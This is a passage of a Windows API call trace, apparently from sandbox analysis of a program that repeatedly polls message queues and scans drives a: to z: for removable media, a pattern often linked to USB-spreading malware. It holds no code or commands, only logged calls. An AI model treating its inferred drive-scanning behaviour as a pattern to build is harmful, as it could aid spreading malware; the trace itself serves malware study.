2 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0219.509] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0219.509] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.510] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0219.510] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.510] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.510] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0219.510] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0219.511] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.511] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.511] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.511] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.511] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.511] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.511] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.511] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.512] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.512] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.512] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.512] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.512] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.513] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.513] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.513] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.513] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.513] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.513] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.514] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.514] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.514] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.514] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.515] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.515] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.516] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.516] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.516] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.516] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.517] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.517] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.517] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.517] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.517] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0219.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0219.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0219.517] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0219.518] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.518] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0219.518] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.518] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.518] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.519] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.519] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.519] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.519] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.519] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.519] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.519] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.520] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.520] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.520] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.520] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.520] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.520] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.521] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.521] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.521] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.521] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.521] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.521] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.522] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.522] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.522] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.522] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.522] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.522] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.523] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.523] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.523] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0219.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0219.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0219.524] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0219.524] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.524] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.524] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.524] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.525] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.525] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.525] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.525] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.526] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.526] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.526] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.526] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.526] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.527] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.527] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.527] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.527] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.527] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.527] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.528] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.528] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.528] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.528] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.528] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.528] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.528] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.529] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.529] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.529] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.529] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.529] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.529] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.530] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, 